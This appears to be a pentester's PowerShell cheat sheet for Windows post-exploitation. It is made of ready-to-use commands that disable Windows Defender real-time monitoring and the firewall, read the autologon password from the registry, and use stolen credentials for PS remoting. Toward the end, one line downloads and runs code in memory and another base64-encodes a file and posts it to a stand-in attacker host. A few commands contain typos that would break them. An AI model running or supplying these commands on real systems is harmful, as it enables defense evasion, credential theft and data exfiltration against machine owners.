powershell.cheat

% powershell

# Show if Powershell ConstrainedLanguage is enable
$ExecutionContext.SessionState.LanguageMode

# Show if Applocker is enabled
Get-AppLockerPolicy -Effective

# Show if Defender WDAC DeviceGuard is enabled
Cet-CimInstance -ClassName Win32_DeviceGuard -Nmespace root\Microsoft\Windows\DeviceGuard

# Windows Defender excluded path
(Get-MpPreference).Exclusionpath

# Disable Windows Defender realtime monitoring
Set-MpPreference -DisableRealtimeMonitoring $true

# PS remoting
$pass = ConvertTo-SecureString <pass> -asplaintext -force
$cred = New-Object System.Management.Automation.PSCredential(<user>, $pass)
$session = New-PSSession -ComputerName <target> -Credential $creds

# PSSESSION
echo '$cred = Get-Credential'
echo 'Enter-PSSession -ComputerName <TARGET> -Authentication Negotiate -Credential $cred'

# Invoke-Command on remote computer via PS Remoting Session
Invoke-Command -ScriptBlock{hostname;whoami;Get-LocalGroupMember -Group Administrators} -Session <session>

# Search Scheduled Task base on arguments list, print details
(Get-ScheduledTask | ?{$_.Actions.Arguments -match "<argumentpattern>"} ).Actions

# Registry get autologon
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "DefaultPassword"

# Get Shell options and history path
Get-PSReadlineOption

# mssql query via powershell
Invoke-Sqlcmd -Query '<query>' -Username <user> -Password <pass>

# Disable windows firewall
Set-NetFirewallProfile -Name Domain,Private,Public -Enabled False

# Download in Memory
echo 'iex (New-Object Net.WebClient).DownloadString(\'<URL>\')'

# Convert file to base64 and upload it to attack machine webserver listening with netcat
echo '$Base64String = [System.convert]::ToBase64String((Get-Content -Path "c:/<PATH>" -Encoding Byte))'
echo 'Invoke-WebRequest -Uri http://<ATTACKIP> -Method POST -Body $Base64String'